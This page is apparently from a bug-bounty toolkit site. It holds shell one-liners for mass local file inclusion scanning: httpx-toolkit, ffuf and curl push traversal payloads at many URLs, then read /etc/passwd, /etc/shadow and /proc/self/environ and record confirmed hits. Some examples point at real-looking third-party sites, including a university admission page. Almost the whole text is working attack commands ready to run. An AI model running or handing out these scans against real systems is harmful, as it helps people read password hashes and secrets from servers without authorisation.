cat check.txt | sed 's/=.*/=/' | xargs -P 20 -I {} sh -c 'echo {} | httpx-toolkit -paths /lfi.txt -random-agent -mc 200 -mr "root:(x|\*|\$[^\:]*):0:0:" -silent | head -n 1' > lfi_hits.txt && while read -r url; do echo -n "$url ... "; if curl -s -k --max-time 10 "$url" | grep -q "root:[x*$][^:]*:0:0:"; then echo -e "\033[1;32mCONFIRMED\033[0m" && echo "$url" >> confirmed_lfi.txt; else echo -e "\033[1;31mFAILED\033[0m"; fi; done < lfi_hits.txt

Check All Paths

while read -r url; do for path in "/etc/passwd" "/etc/shadow" "/etc/shells" "/etc/group" "/etc/profile" "/etc/hosts" "/proc/self/environ" "/proc/self/status" "/proc/mounts" "/proc/version" "/bin/sh"; do modified_url="${url/\/etc\/passwd/$path}"; echo -n "$modified_url ... "; response=$(curl -s -k --max-time 10 "$modified_url"); if [[ "$path" == "/etc/passwd" ]] && echo "$response" | grep -q "root:[x*$][^:]*:0:0:"; then echo -e "\033[1;32mCONFIRMED\033[0m" && echo "$modified_url" >> confirmed_lfi.txt; elif [[ "$path" == "/etc/shadow" ]] && echo "$response" | grep -q "root:\$[0-9]\$[a-zA-Z0-9]"; then echo -e "\033[1;32mCONFIRMED\033[0m" && echo "$modified_url" >> confirmed_lfi.txt; elif [[ "$path" == "/proc/self/environ" ]] && echo "$response" | grep -q "USER=\|PATH="; then echo -e "\033[1;32mCONFIRMED\033[0m" && echo "$modified_url" >> confirmed_lfi.txt; elif echo "$response" | grep -q "Permission denied\|No such file\|Forbidden\|Error"; then echo -e "\033[1;33mBLOCKED\033[0m"; else echo -e "\033[1;31mSAFE\033[0m"; fi; done; done < lfi_hits.txt

echo "https://mylocal.life/index.php?page=" | sed 's/=.*/=/' | httpx-toolkit -paths /lfi.txt -threads 50 -random-agent -mc 200 -mr "root:(x|\*|\$[^\:]*):0:0:"
echo "http://testphp.vulnweb.com/showimage.php?file=" | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w /lfi.txt -c -mr "root:(x|\*|\$[^\:]*):0:0:" -v; done
echo "https://admission.lumhs.edu.pk/web/home/tv.php?filesrc=2" | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

ADCE626 Bug Bounty Toolkitadce626.vercel.app